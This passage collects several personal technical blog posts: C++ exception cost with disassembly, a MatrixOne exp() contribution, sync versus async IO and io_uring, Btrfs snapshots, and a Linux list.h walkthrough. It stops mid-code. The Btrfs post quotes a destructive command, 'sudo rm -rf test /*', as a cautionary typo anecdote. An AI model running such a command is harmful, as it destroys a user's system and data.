0x0000000000401996 <+1>:     mov    rbp,rsp
0x0000000000401999 <+4>:     push   rbx
0x000000000040199a <+5>:     sub    rsp,0x18
0x000000000040199e <+9>:     mov    DWORD PTR [rbp-0x14],edi
0x00000000004019a1 <+12>:    mov    eax,DWORD PTR [rbp-0x14]
0x00000000004019a4 <+15>:    and    eax,0x1
0x00000000004019a7 <+18>:    test   eax,eax
0x00000000004019a9 <+20>:    je     0x4019dc <bar(unsigned int)+71>
0x00000000004019ab <+22>:    mov    edi,0x8
0x00000000004019b0 <+27>:    call   0x401dc0 <__cxa_allocate_exception>
0x00000000004019b5 <+32>:    mov    rbx,rax
0x00000000004019b8 <+35>:    mov    rdi,rbx
0x00000000004019bb <+38>:    call   0x401a96 <std::exception::exception()>
0x00000000004019c0 <+43>:    mov    rax,0x402080
0x00000000004019c7 <+50>:    mov    rdx,rax
0x00000000004019ca <+53>:    lea    rax,[rip+0xc7dc7]        # 0x4c9798 <typeinfo for std::exception>
0x00000000004019d1 <+60>:    mov    rsi,rax
0x00000000004019d4 <+63>:    mov    rdi,rbx
0x00000000004019d7 <+66>:    call   0x402e30 <__cxa_throw>
0x00000000004019dc <+71>:    nop
0x00000000004019dd <+72>:    mov    rbx,QWORD PTR [rbp-0x8]
0x00000000004019e1 <+76>:    leave  
0x00000000004019e2 <+77>:    ret

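The assembly uses __cxa_throw to throw the exception. The call to __cxa_throw does not return to the next instruction; control jumps to the matching catch clause (covered below) or to terminate (if the exception is not caught).

This is part of the call stack while the exception is thrown (arrows point from caller to callee):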

__cxa_throw -> _Unwind_RaiseException -> uw_init_context_1 -> uw_frame_state_for -> _Unwind_Find_FDE -> search_object -> classify_object_over_fdes

__cxa_throw -> _Unwind_RaiseException -> uw_init_context_1 -> uw_frame_state_for -> execute_cfa_program

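The code involved here is neither very long nor very short; interested readers can look it up in the GCC source, so Y7n05h does not reproduce it here.

After seeing these functions, one no longer asks how the cost of one exception compares with the cost of one if-else.

Note: compared with a single if-else, the exception mechanism necessarily costs more. Throwing an exception executes orders of magnitude more code than a single if-else, so the comparison is meaningless. It is equally absurd to use such a comparison to judge the performance of "error codes" versus "exceptions" as error-handling mechanisms (see below).

So the exception mechanism usually makes the bad path of the code slower.

Having looked at how throw is implemented, let's look at catch (the disassembly of foo):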

0x00000000004019e3 <+0>:     push   rbp
0x00000000004019e4 <+1>:     mov    rbp,rsp
0x00000000004019e7 <+4>:     push   rbx
0x00000000004019e8 <+5>:     sub    rsp,0x18
0x00000000004019ec <+9>:     mov    DWORD PTR [rbp-0x14],edi
0x00000000004019ef <+12>:    mov    eax,DWORD PTR [rbp-0x14]
0x00000000004019f2 <+15>:    mov    edi,eax
0x00000000004019f4 <+17>:    call   0x401995 <bar(unsigned int)>
0x00000000004019f9 <+22>:    lea    rax,[rip+0x98604]        # 0x49a004
0x0000000000401a00 <+29>:    mov    rdi,rax
0x0000000000401a03 <+32>:    call   0x421a00 <puts>
0x0000000000401a08 <+37>:    jmp    0x401a3b <foo(int)+88>
0x0000000000401a0a <+39>:    mov    rdi,rax
0x0000000000401a0d <+42>:    call   0x401f30 <__cxa_begin_catch>
0x0000000000401a12 <+47>:    lea    rax,[rip+0x985ef]        # 0x49a008
0x0000000000401a19 <+54>:    mov    rdi,rax
0x0000000000401a1c <+57>:    call   0x421a00 <puts>
0x0000000000401a21 <+62>:    call   0x401fa0 <__cxa_end_catch>
0x0000000000401a26 <+67>:    jmp    0x4019f9 <foo(int)+22>
0x0000000000401a28 <+69>:    mov    rbx,rax
0x0000000000401a2b <+72>:    call   0x401fa0 <__cxa_end_catch>
0x0000000000401a30 <+77>:    mov    rax,rbx
0x0000000000401a33 <+80>:    mov    rdi,rax
0x0000000000401a36 <+83>:    call   0x4102f0 <_Unwind_Resume>
0x0000000000401a3b <+88>:    mov    rbx,QWORD PTR [rbp-0x8]
0x0000000000401a3f <+92>:    leave
0x0000000000401a40 <+93>:    ret

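If bar does not throw, 0x00000000004019f4 <+17>: call 0x401995 <bar(unsigned int)> returns normally to 0x00000000004019f9 <+22>: lea rax,[rip+0x98604] # 0x49a004; if bar throws, execution resumes after that call at 0x0000000000401a0a <+39>: mov rdi,rax.
So try { ... } itself costs essentially nothing; the cost arises only when an exception is actually thrown and has to be caught.
Compared with error codes, the exception-based approach removes one conditional jump from the happy path (the case where nothing is thrown), or several conditional jumps if the result has to be passed back through several levels of calls. As is well known, conditional jumps can incur branch misprediction penalties. The exception mechanism is therefore an optimization for the happy path.

Now look at part of the call stacks of __cxa_begin_catch and __cxa_end_catch (arrows point from caller to callee):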

__cxa_begin_catch -> __cxa_get_globals

__cxa_end_catch -> __cxa_get_globals_fast
__cxa_end_catch -> _Unwind_DeleteException

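These call stacks are all shallow. In the throw/catch mechanism as a whole, the complexity is in throw, and catch does very little work, as the depth of the call stacks already hints.

Should exceptions be used?

The discussion above showed that exceptions have the advantage over error codes on the happy path and the disadvantage on the bad path.
Returning an error code level by level through a deep call stack may take several if-else checks, that is several conditional jumps, each with a potential branch misprediction penalty. In that case the cost of using exceptions may be comparatively low.

Using exceptions efficiently means playing to their strengths and avoiding their weaknesses. Discussing only their advantage on the happy path, or only their disadvantage on the bad path, is one-sided.
Any discussion of exceptions has to weigh both effects.
Exceptions beat error codes only when the vast majority of executions stay on the happy path, so that the gain on the happy path outweighs the loss on the bad path.

Back to the LeetCode problem from the beginning: the exception is thrown whenever a key that is not in the LRU cache is looked up, which is clearly not rare (at least not in this test scenario). Y7n05h used exceptions as control flow for a common case, which goes against playing to their strengths, so the poor performance is no surprise.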
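To get a feel for the bad-path cost on one's own machine, a micro-benchmark along the following lines may help. It is only a sketch: the function names are invented for this example, the workload (probing keys 0..probes-1 in a small table) is an assumption, and the timings depend heavily on compiler, standard library and hardware, so no numbers are claimed here.

```cpp
#include <chrono>
#include <stdexcept>
#include <unordered_map>

using Table = std::unordered_map<int, int>;

// Misses are reported by exception, as in the first LRUCache version.
inline int missesViaException(const Table &t, int probes) {
    int misses = 0;
    for (int k = 0; k < probes; ++k) {
        try {
            (void)t.at(k);  // throws std::out_of_range when k is absent
        } catch (const std::out_of_range &) {
            ++misses;
        }
    }
    return misses;
}

// Misses are reported by an ordinary branch.
inline int missesViaBranch(const Table &t, int probes) {
    int misses = 0;
    for (int k = 0; k < probes; ++k) {
        if (t.find(k) == t.end()) ++misses;
    }
    return misses;
}

// Wall-clock time of one call to f, in microseconds.
template <typename F>
long long microseconds(F &&f) {
    auto start = std::chrono::steady_clock::now();
    f();
    auto stop = std::chrono::steady_clock::now();
    return std::chrono::duration_cast<std::chrono::microseconds>(stop - start).count();
}
```

Calling `microseconds([&] { missesViaException(table, n); })` and the same with `missesViaBranch` for a table that misses most keys gives a direct comparison of the two bad paths; making most keys hit shows the happy path instead.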

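For a more detailed and rigorous comparison of exceptions with other error-handling approaches, and for guidance on when to use exceptions, see references 1 and 2.

How exceptions work

For Y7n05h, the original problem is now solved: how slow exceptions are and where they should be used both have answers.
This section only takes a quick look at why throw is so slow, which means looking at how __cxa_throw is actually implemented.

For a detailed, concrete account of how C++ exceptions are implemented, see reference 3; it is excellent material.

—

When an exception is thrown, the program, guided by the information in the .eh_frame section of the ELF file, has to walk the stack twice (once to find the catch, and once to run the destructors of the objects on the stack, frame by frame).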
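The observable effect of the second walk can be seen in a small program: a local object in the throwing function is destroyed during unwinding, before the body of the catch handler runs. The names below (`Tracer`, `thrower`, `unwindOrder`) are invented for this sketch; it shows only the ordering, not the internals of the unwinder.

```cpp
#include <stdexcept>
#include <string>

// Appends a marker to the log on construction and on destruction.
struct Tracer {
    std::string &log;
    explicit Tracer(std::string &l) : log(l) { log += "ctor;"; }
    ~Tracer() { log += "dtor;"; }
};

inline void thrower(std::string &log) {
    Tracer guard(log);                 // lives on thrower's stack frame
    throw std::runtime_error("boom");  // unwinding destroys guard
}

// Returns the order of events recorded while the exception propagates.
inline std::string unwindOrder() {
    std::string log;
    try {
        thrower(log);
    } catch (const std::runtime_error &) {
        log += "catch;";  // runs only after the frame above was cleaned up
    }
    return log;
}
```

`unwindOrder()` returns "ctor;dtor;catch;": the destructor entry appears before the handler entry.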

The .eh_frame section is by no means small.
For the SimpleException.cpp example above, the .eh_frame section takes up 0x108 bytes, while the .text section takes up only 0x1ef bytes.

References

¹：Bjarne Stroustrup. C++ exceptions and alternatives[G/OL]. http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2019/p1947r0.pdf.
²：Herb Sutter. Zero-overhead deterministic exceptions: Throwing values[G/OL]. http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2019/p0709r4.pdf.
³：Nico Brailovsky. C++ exceptions under the hood[G/OL]. https://monkeywritescode.blogspot.com/p/c-exceptions-under-hood.html.
⁴：江召伟. c++ 异常处理[G/OL]. https://www.cnblogs.com/jiangzhaowei/p/4989197.html.

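Published 2022-03-14 · 7 min read (about 1110 characters)

Reflections on Contributing to MatrixOne

First encounter

For readers who have not heard of MatrixOne yet, here is an introduction: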

MatrixOne is a future-oriented hyper-converged cloud and edge native DBMS that supports transactional, analytical, and streaming workloads with a simplified and distributed database engine, across multiple data centers, clouds, edges and other heterogeneous infrastructures.[1]

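In Y7n05h's personal impression, this is a thriving community. In the last few days alone, the main branch on GitHub has received many commits.

Since Y7n05h happens to be very interested in the design of database systems, Y7n05h wanted to join in and see whether it was possible to implement something the community needs.

Getting involved

Of course, contributing to a community is not something to do casually. First, Y7n05h read the CoC carefully and found its terms broadly consistent with Y7n05h's own values; the community is also welcoming to new participants. Then Y7n05h looked at the project's License: it is Apache-2.0, a free software / open source license approved by both the FSF and the OSI.

With that, Y7n05h had no further reservations about the MatrixOne community and picked a simple issue labeled good first issue to work on.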

[Feature Request]: Mathematical Built-in function exp()

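This is the issue Y7n05h decided to work on.
The issue asks for an implementation of the function exp(), that is $e^x$ in mathematics. It links to a very detailed document that guides contributors through adding a new built-in function to MatrixOne.

Back to exp(): it is a common mathematical function; for ease of explanation, Y7n05h shows its graph here.

Secondary-school mathematics is enough to see that its domain is $\mathbb{R}$ and its range is $(0,+\infty)$.

Given the mathematical properties of this function, some design decisions are needed. The first question is what type the function should return.
Y7n05h considered accepting an integer input and returning an integer result with the fractional part truncated. That is not reasonable: $e^{45}$ overflows even when stored in a Uint64. If the function returned an integer, calling exp() with any integer argument greater than or equal to 45 would yield an overflowed value. That is clearly unacceptable.
How to get out of this? By changing the return type to floating point. Results for small inputs keep their fractional part, and for large inputs an approximation of the result can still be stored, at the cost of some precision, despite the explosive growth of the exponential function.

It is therefore natural to accept any integer or floating-point type as input and return a float64.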
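The threshold of 45 can be checked numerically. The sketch below is in C++ and is not MatrixOne code; `fitsInUint64` is a name invented for this example. It compares $e^{44}$ and $e^{45}$ against $2^{64}$, computed as `std::ldexp(1.0, 64)`.

```cpp
#include <cmath>

// True if v is non-negative and below 2^64, i.e. its integer part would
// still fit into an unsigned 64-bit integer.
inline bool fitsInUint64(double v) {
    return v >= 0.0 && v < std::ldexp(1.0, 64);  // ldexp(1.0, 64) == 2^64
}
```

Since $\ln 2^{64} = 64 \ln 2 \approx 44.36$, `fitsInUint64(std::exp(44.0))` holds while `fitsInUint64(std::exp(45.0))` does not. A float64, by contrast, can still hold a finite approximation of `std::exp(709.0)`.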

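The next difficulty is implementing the built-in function. According to the document, only two steps are needed:

Register the function's types
Implement the function

After that, unit tests for the implementation still have to be written.

All of this actually touches just 4 files.

At the beginning, despite the very detailed document, Y7n05h could not fully understand how the function was supposed to be implemented. Being new to the project, Y7n05h also could not make sense of its complex structure (understanding part of the structure would have been enough, but at that time Y7n05h did not understand even that part).
This was not a dead end, though. In the project source, log(), ln() and abs() are implemented in a way very similar to what exp() needs, and existing implementations are the best supplement where the document falls short. By studying those functions, Y7n05h eventually completed the issue.

References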

¹. matrixone.[G/OL].https://github.com/matrixorigin/matrixone/blob/main/README.md. ↩

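Published 2022-01-04 · Dev · 17 min read (about 2600 characters)

True Asynchrony: A Casual Talk on io_uring

Interfaces of the Past

IO has always been troublesome. For a von Neumann computer, IO is arguably where computation begins and ends. IO is therefore a nuisance, yet extremely important.
Efficient IO is indispensable for building efficient applications, and it is a topic that computer scientists and engineers have discussed for a long time.

In this article, the author briefly reviews the IO interfaces that the Linux Kernel already provides.

Note: this article does not cover how to use io_uring. For usage, please go straight to the references of this article.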

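Synchronous Interfaces

Common syscalls such as read and write are synchronous IO interfaces.
The read/write family also gave rise to the offset-taking variants pread and pwrite, the vectored variants readv and writev, and preadv and pwritev, which combine both. Later, preadv2 and pwritev2 added a flags field to preadv and pwritev.

That said, what exactly does synchronous mean?

The most distinctive feature of a synchronous interface is that the application is either executing its own user code, or it is busy completing IO.
If that sounds vague, look at the figure below. Synchronous means that "the completion of the IO" happens at "the moment the IO is requested" (~~Y7n05h is not eloquent and really does not know how to phrase this better~~)

In the figure:

Purple represents the application executing user code
Red represents the application completing IO

We can see that the purple blocks and the red blocks never overlap in time. Completing IO never happens at the same time as running user code.

Y7n05h guesses that some readers want to ask why, after all this, blocking and non-blocking have not been mentioned even once.

Please allow Y7n05h to discuss asynchronous IO first, because many people conflate non-blocking with asynchronous. Y7n05h believes that explaining asynchronous IO first helps in understanding both concepts.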

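Asynchronous Interfaces

The opposite of synchronous is asynchronous.

Asynchronous means that the application only needs to submit an IO request once; another component (usually the kernel) completes the IO and tells the application when it is done.

Note: experienced readers will notice that Y7n05h deliberately blurs the kernel's role in IO here and does not mention trapping into kernel mode through system calls. This is so that the description of asynchrony in this article also applies to user-space implementations of asynchronous IO such as ASIO.

As the figure below shows, the application does not need to interrupt the execution of its code. It submits a request once and then simply waits for someone else (usually the kernel) to complete the IO.

Asynchronous IO is like a smart boss (the application) who has hired a capable assistant. For tasks such as sending and receiving documents (the IO), the boss only has to give the word and the assistant takes care of it. When the job is done, the assistant tells the boss. The boss simply carries on with their own work (executing code).

Synchronous IO is like a boss (the application) without an assistant, who has to send and receive documents (the IO) personally. While busy with the documents, the boss cannot do their own work (executing code).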

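Blocking and Non-blocking

To talk about blocking and non-blocking, we have to talk about the kernel.
On Linux, whether blocking or non-blocking IO is used, the call returns immediately if the IO is already ready.
The difference between blocking and non-blocking is limited to the case where the IO is not yet ready (for example, writing to a pipe whose buffer is full, or reading from a socket on which no data has arrived). In such cases, a non-blocking system call returns immediately and reports the error to the caller through its return value and errno. A blocking system call keeps waiting until the IO completes.

Q: So what does blocking or non-blocking have to do with synchronous and asynchronous?
A: In most contexts, blocking and non-blocking refer to synchronous blocking and synchronous non-blocking. Whether asynchronous IO blocks is usually not discussed.

Why? To answer that, we need to continue reviewing how IO interfaces evolved.

As everyone knows, both network IO and disk IO are far slower than the CPU. Waiting for IO therefore wastes time in which the application could have done a lot of other work. Applications that pursue high performance are naturally unwilling to sit idle while waiting for IO to happen.
In Y7n05h's view, synchronous non-blocking IO calls exist to solve the problem of applications wasting time on long IO waits. With non-blocking IO, the application can check every short while whether the IO is ready, and spend the rest of the time on other work. This is what is known as polling.
An IO-intensive application (a server, for example) may need to handle a large number of IO requests at the same time. Iterating over all of them and polling each for readiness is one approach, and the kernel provides facilities for this iterate-and-poll operation (select, poll), but even within synchronous IO this is not the best approach. The kernel also provides the epoll mechanism: when the kernel learns through the interrupt mechanism that an IO event has occurred, it notifies the application. This avoids the cost of iteration and improves IO efficiency. This is IO multiplexing.

The semantics of non-blocking IO are: give it a try; if the IO can be completed, complete it; if not, never mind.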
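The "give it a try" semantics can be observed with an ordinary pipe. The following is a minimal sketch for a Unix-like system using only the Python standard library; `try_read` is a helper invented for this example.

```python
import os

read_fd, write_fd = os.pipe()
os.set_blocking(read_fd, False)   # switch the read end to non-blocking mode


def try_read(fd: int, size: int = 16):
    """Attempt one read; return the data, or None if the IO is not ready."""
    try:
        return os.read(fd, size)
    except BlockingIOError:       # the kernel reported EAGAIN / EWOULDBLOCK
        return None


first = try_read(read_fd)         # nothing has been written yet
os.write(write_fd, b"hello")
second = try_read(read_fd)        # data is ready now, so the read succeeds

os.close(read_fd)
os.close(write_fd)
print(first, second)
```

With the read end left in blocking mode, the first `os.read` would instead wait until some data was written to the pipe.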

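After all this, readers have surely noticed that non-blocking IO is simply about improving CPU utilization.

Back to asynchrony: since asynchronous IO can no longer stall the application's code, whether it blocks or not becomes meaningless.
Non-blocking is not only meaningless in asynchronous IO, it would actually cause trouble. Why? Because non-blocking IO returns immediately when the IO is not ready.

Return to the example of the boss and the assistant. The boss would certainly not want an assistant who, when sent to deliver a document, comes back to report failure merely because the recipient could not be found. The boss wants the assistant to wait for the recipient to return and then hand over the document. That is a smart assistant. Asynchronous IO fits all of these criteria perfectly.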

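io_uring Rules Them All

Before io_uring appeared, applications that pursued high-performance IO commonly used one of these approaches:

For file IO, the AIO asynchronous interface.
epoll + synchronous non-blocking.
An approach similar to boost Asio, which uses IO threads to emulate an asynchronous interface.

But each of these approaches has its own problems:

AIO only supports Direct IO on files.
epoll + synchronous non-blocking has higher overhead and higher latency than io_uring in high-concurrency scenarios with a large number of connections.
boost Asio and io_uring are both asynchronous interfaces, but io_uring's implementation in kernel space is more efficient than emulating asynchronous IO with multiple threads in user space.

It is fair to say that AIO is displaced by io_uring mainly because AIO's range of application is too narrow, while "epoll + synchronous non-blocking" and "boost Asio" lose to io_uring because io_uring performs better.

But io_uring is not without drawbacks.

Poor portability.
This is a hard flaw of io_uring. io_uring is a new interface added in Linux 5.1, and some of its features only landed in 5.6. So experiencing a relatively complete feature set may require Linux Kernel 5.6+. (Although io_uring in Linux Kernel 5.6 is already relatively complete, Linux Kernel 5.10-5.15 added further features to io_uring.)

Complex interface.
Did you notice? io_uring replaces "epoll + synchronous non-blocking", not just epoll. To support all kinds of IO calls, io_uring describes every type of IO request through the large struct io_uring_sqe. But the complexity of the io_uring interface does not end there. io_uring_setup, io_uring_enter and io_uring_register look like only 3 system calls, yet each of them supports more than ten flags that change its behavior.

So why does io_uring perform well?

The kernel and user space share part of the io_uring data structures through mmap.
The kernel can execute the IO requests submitted by the application in parallel.
Fewer system calls. An IO request only has to be placed in the submission queue (SQ); there is no need to trap into the kernel with a separate system call for each request.

MoreInfo

This article ends here. Readers may find the ending abrupt, but Y7n05h never intended this article to be an introduction to using io_uring. It only aims to explain the differences between these IO approaches, and to distinguish the pair of concepts "blocking" and "non-blocking" from the pair "synchronous" and "asynchronous". Readers who need to learn io_uring in detail should see the references below.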

References

¹. Efficient IO with io_uring.[G/OL].https://kernel.dk/io_uring.pdf. ↩

². What is io_uring?. [G/OL]. Lord of the io_uring, https://unixism.net/loti/what_is_io_uring.html. ↩

³. IO_URING(7). [G/OL]. Linux Programmer’s Manual, https://man.archlinux.org/man/io_uring.7. ↩

⁴. IO_URING_SETUP(2). [G/OL]. Linux Programmer’s Manual, https://man.archlinux.org/man/io_uring_setup.2. ↩

⁵. IO_URING_ENTER(2). [G/OL]. Linux Programmer’s Manual, https://man.archlinux.org/man/io_uring_enter.2. ↩

⁶. IO_URING_REGISTER(2). [G/OL]. Linux Programmer’s Manual, https://man.archlinux.org/man/io_uring_register.2. ↩

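Published 2021-11-29 · 8 min read (about 1143 characters)

Using Btrfs Filesystem Snapshots

Like other ArchLinux users, Y7n05h is keen on trying out interesting and practical technologies.

Btrfs had long tempted Y7n05h with CoW, transparent compression and subvolume management. So as early as a year before writing this article, Y7n05h had already tried Btrfs, a filesystem that lives in the Linux Kernel source tree.
Back then Y7n05h used btrfs only superficially (none of the features that btrfs has and xfs lacks were used). By now Y7n05h has tried many btrfs features and has come to consider them important.
Below, please allow Y7n05h to share some thoughts on them.

Subvolume Management

Since subvolume management has been mentioned, let us first say what a subvolume is: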

A Btrfs subvolume is an independently mountable POSIX filetree and not a block device (and cannot be treated as one). Most other POSIX filesystems have a single mountable root, Btrfs has an independent mountable root for the volume (top level subvolume) and for each subvolume; a Btrfs volume can contain more than a single filetree, it can contain a forest of filetrees. A Btrfs subvolume can be thought of as a POSIX file namespace.[1]

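To make things easier to understand when first getting to know btrfs, it may help to think of subvolumes as several different partitions.

For common subvolume layouts, see: here.

Snapshots

Having roughly covered subvolumes, we can now talk about snapshots.

Q: Why use snapshots?
A: Snapshots are for recovery and rollback, as everyone knows. As for why I need them: they leave more room to recover from my own mistakes and avoid reinstalling the system. They also provide a convenient way to recover when an application error causes a system fault or crash. I think the use of snapshots is self-evident.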

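TIP

Some might say: just be careful and do not make mistakes; as long as you use commands cautiously, you will never need snapshots.

Of course, Y7n05h does not want to end up in a situation where recovery from a snapshot is needed either. After all, having to recover already means that a failure has happened. But mistakes are sometimes hard to avoid through caution alone. Caution is necessary when using Linux commands, but when things really do go bad, snapshots are a powerful tool for quickly pulling a crashed system out of the mud.

An example:
Y7n05h once wanted to remove all files under a folder and meant to run sudo rm -rf test/*, but did not notice an extra space, which turned the command into sudo rm -rf test /* and caused /* to be deleted by mistake. In the end, the only fix was to reinstall the system.

btrfs currently only supports taking snapshots of btrfs subvolumes, and a snapshot itself exists as a special btrfs subvolume.
For how to create and delete snapshots, see ArchLinuxWiki-Btrfs#Snapshots or the relevant content in the Btrfs Wiki. This article deliberately gives no concrete commands, in the hope that readers who want to try btrfs after reading it will study the wiki and the related documentation carefully and make a prudent decision, rather than simply being swayed by Y7n05h.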

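Automatic Snapshots

Thanks to the relatively cheap cost of snapshots on Btrfs, taking snapshots frequently is not necessarily unacceptable.

snapper

Y7n05h uses snapper, from openSUSE, to automate btrfs snapshots.
snapper takes a snapshot of a btrfs subvolume every hour and automatically deletes old snapshots.

With the default configuration, snapper keeps 10 hourly snapshots, 10 daily snapshots, 10 monthly snapshots and 10 yearly snapshots.[2]

btrfs-autosnapshot

Of course, btrfs-autosnapshot by lilydjwg is a good tool as well.
As a Python script, btrfs-autosnapshot offers a more customizable way to control the creation and cleanup of snapshots.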

References

¹. BtrfsWiki编者. SysadminGuide[G/OL]. BtrfsWiki, https://btrfs.wiki.kernel.org/index.php/SysadminGuide#Subvolumes. ↩

². ArchWiki编者. Installation guide (简体中文)[G/OL]. ArchWiki, https://wiki.archlinux.org/index.php/Installation_guide_(简体中文). ↩

³. farseerfc. Btrfs vs ZFS 实现 snapshot 的差异[G/OL]. Farseerfc的小窝, https://farseerfc.me/zhs/btrfs-vs-zfs-difference-in-implementing-snapshots.html. ↩

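Published 2021-11-13 · 12 min read (about 1750 characters)

An Incomplete Analysis of the Linux Kernel list.h Source

It has been a while since Y7n05h last wrote a proper blog post. Failing to keep it up is something Y7n05h is rather ashamed of, so writing this article today is a way of making amends.

License
This article quotes some source code from the Linux Kernel. The code is taken from LinuxKernel v2.6.34 and is licensed under GPLv2.

list.h Source Analysis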

/*
 * Simple doubly linked list implementation.
 *
 * Some of the internal functions ("__xxx") are useful when
 * manipulating whole lists rather than single entries, as
 * sometimes we already know the next/prev entries and we can
 * generate better code by using them directly rather than
 * using the generic single-entry routines.
 */

struct list_head {
	struct list_head *next, *prev;
};

#define LIST_HEAD_INIT(name) { &(name), &(name) }

#define LIST_HEAD(name) \
	struct list_head name = LIST_HEAD_INIT(name)

static inline void INIT_LIST_HEAD(struct list_head *list)
{
	list->next = list;
	list->prev = list;
}

This is the core structure of the list, together with the initialization of a circular doubly linked list.

static inline void __list_add(struct list_head *new,
			      struct list_head *prev,
			      struct list_head *next)
{
	next->prev = new;
	new->next = next;
	new->prev = prev;
	prev->next = new;
}

/**
 * list_add - add a new entry
 * @new: new entry to be added
 * @head: list head to add it after
 *
 * Insert a new entry after the specified head.
 * This is good for implementing stacks.
 */
static inline void list_add(struct list_head *new, struct list_head *head)
{
	__list_add(new, head, head->next);
}


/**
 * list_add_tail - add a new entry
 * @new: new entry to be added
 * @head: list head to add it before
 *
 * Insert a new entry before the specified head.
 * This is useful for implementing queues.
 */
static inline void list_add_tail(struct list_head *new, struct list_head *head)
{
	__list_add(new, head->prev, head);
}

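Insertion does not need much explanation either. The only point worth mentioning is that using inline removes the function call overhead, at the cost of a larger kernel, but I think that cost is worth paying.
The reuse of __list_add() and the way it abstracts the two different kinds of insertion are also quite elegant.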
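To see why the kernel comments describe list_add() as good for stacks and list_add_tail() as useful for queues, the same pointer updates can be replayed in a toy model. This is a sketch in Python rather than kernel code; the `ListHead` class and the `names` helper are invented for the illustration.

```python
class ListHead:
    """Toy counterpart of struct list_head: a node in a circular doubly linked list."""

    def __init__(self, name=None):
        self.name = name
        self.next = self   # like INIT_LIST_HEAD: an empty list points at itself
        self.prev = self


def _list_add(new, prev, next_):
    # The same four pointer updates as __list_add(), in the same order.
    next_.prev = new
    new.next = next_
    new.prev = prev
    prev.next = new


def list_add(new, head):
    _list_add(new, head, head.next)   # insert right after head


def list_add_tail(new, head):
    _list_add(new, head.prev, head)   # insert right before head


def names(head):
    """Walk the list from head.next back to head and collect node names."""
    out, pos = [], head.next
    while pos is not head:
        out.append(pos.name)
        pos = pos.next
    return out


stack, queue = ListHead(), ListHead()
for n in ("a", "b", "c"):
    list_add(ListHead(n), stack)
    list_add_tail(ListHead(n), queue)

print(names(stack))  # newest element first (LIFO order)
print(names(queue))  # oldest element first (FIFO order)
```

Both public functions differ only in which pair of neighbours they pass to the shared helper, which is the reuse the paragraph above refers to.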

/*
 * Delete a list entry by making the prev/next entries
 * point to each other.
 *
 * This is only for internal list manipulation where we know
 * the prev/next entries already!
 */
static inline void __list_del(struct list_head * prev, struct list_head * next)
{
	next->prev = prev;
	prev->next = next;
}

/**
 * list_del - deletes entry from list.
 * @entry: the element to delete from the list.
 * Note: list_empty() on entry does not return true after this, the entry is
 * in an undefined state.
 */
#ifndef CONFIG_DEBUG_LIST
static inline void list_del(struct list_head *entry)
{
	__list_del(entry->prev, entry->next);
	entry->next = LIST_POISON1;
	entry->prev = LIST_POISON2;
}
#else
extern void list_del(struct list_head *entry);
#endif

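There is nothing very puzzling here either. The one thing that may raise curiosity is why the pointers of the deleted list node are set to LIST_POISON1 and LIST_POISON2.
In user-space programming, developers often set invalid pointers to NULL to guard against problems such as Use After Free (UAF): as soon as a pointer set to NULL is dereferenced, a segmentation fault reveals the error. But do not forget that the segmentation fault is delivered by the kernel, so kernel code cannot rely on that safety net in the same way. Instead, these two special non-NULL addresses are used: as the source comment below says, they will result in page faults under normal circumstances, which tells the developer that a memory error has occurred.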

/*
 * Architectures might want to move the poison pointer offset
 * into some well-recognized area such as 0xdead000000000000,
 * that is also not mappable by user-space exploits:
 */
#ifdef CONFIG_ILLEGAL_POINTER_VALUE
# define POISON_POINTER_DELTA _AC(CONFIG_ILLEGAL_POINTER_VALUE, UL)
#else
# define POISON_POINTER_DELTA 0
#endif

/*
 * These are non-NULL pointers that will result in page faults
 * under normal circumstances, used to verify that nobody uses
 * non-initialized list entries.
 */
#define LIST_POISON1  ((void *) 0x00100100 + POISON_POINTER_DELTA)
#define LIST_POISON2  ((void *) 0x00200200 + POISON_POINTER_DELTA)

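The remaining parts contain a lot of material, but they are fairly simple and relatively easy to understand, so Y7n05h will not go through them here.

The list_entry macro shown next is quite interesting, and it uses several GNU extensions to the C language. Working out how to use the macro directly from its definition is somewhat difficult; looking at a use case helps.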

/**
 * list_entry - get the struct for this entry
 * @ptr:	the &struct list_head pointer.
 * @type:	the type of the struct this is embedded in.
 * @member:	the name of the list_struct within the struct.
 */
#define list_entry(ptr, type, member) \
	container_of(ptr, type, member)

/**
 * container_of - cast a member of a structure out to the containing structure
 * @ptr:	the pointer to the member.
 * @type:	the type of the container struct this is embedded in.
 * @member:	the name of the member within the struct.
 *
 */
#define container_of(ptr, type, member) ({			\
	const typeof( ((type *)0)->member ) *__mptr = (ptr);	\
	(type *)( (char *)__mptr - offsetof(type,member) );})

Use case:

static inline struct nfs_page *
nfs_list_entry(struct list_head *head)
{
	return list_entry(head, struct nfs_page, wb_list);
}

struct nfs_page {
	struct list_head	wb_list;	/* Defines state of page: */
	struct page		*wb_page;	/* page to read in/write out */
	struct nfs_open_context	*wb_context;	/* File state context info */
	atomic_t		wb_complete;	/* i/os we're waiting for */
	pgoff_t			wb_index;	/* Offset >> PAGE_CACHE_SHIFT */
	unsigned int		wb_offset,	/* Offset & ~PAGE_CACHE_MASK */
				wb_pgbase,	/* Start of page data */
				wb_bytes;	/* Length of request */
	struct kref		wb_kref;	/* reference count */
	unsigned long		wb_flags;
	struct nfs_writeverf	wb_verf;	/* Commit cookie */
};

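It is clear that in struct nfs_page the list node is struct list_head wb_list.

And head is a pointer to that member. So what does container_of actually do? It computes the address of a structure from the address of one of its members. First, set the code aside and think about the problem: for a given structure on a given architecture with a given alignment, the offset of a member relative to the start of the structure is a constant known at compile time. So given the address of a member, subtracting the corresponding offset yields the address of the structure. All of this is feasible in theory; what remains is how to express it in code.

Next, consider the implementation of container_of:

const typeof( ((type *)0)->member ) *__mptr = (ptr);

Here typeof performs type inference, which enables a form of generic programming: it yields the same type as member, and adding * gives the pointer-to-member type. This line therefore produces a pointer to the structure member. Then (type *)( (char *)__mptr - offsetof(type,member) ) uses the offsetof macro to obtain the offset of member within type, and pointer arithmetic subtracts it from the address of the member.
Finally, the GNU statement expression extension is used, which avoids the hassle of wrapping the macro in do{...}while(0) and, unlike that wrapper, lets the macro yield a value.
None of this is complicated, but the way the macros are used and combined is very elegant.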
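The "member address minus offset" idea can also be tried outside the kernel. The sketch below uses Python's ctypes to lay out C-compatible structures; `Page` is a hypothetical stand-in for struct nfs_page with only two fields, and this `container_of` function is an illustration written for this example, not the kernel macro.

```python
import ctypes


class ListHead(ctypes.Structure):
    pass


# Self-referential structure, so the fields are attached after the class exists.
ListHead._fields_ = [("next", ctypes.POINTER(ListHead)),
                     ("prev", ctypes.POINTER(ListHead))]


class Page(ctypes.Structure):            # hypothetical stand-in for struct nfs_page
    _fields_ = [("index", ctypes.c_ulong),
                ("wb_list", ListHead)]


def container_of(member_addr: int, struct_type, member_name: str):
    """Recover the enclosing structure from the address of one of its members."""
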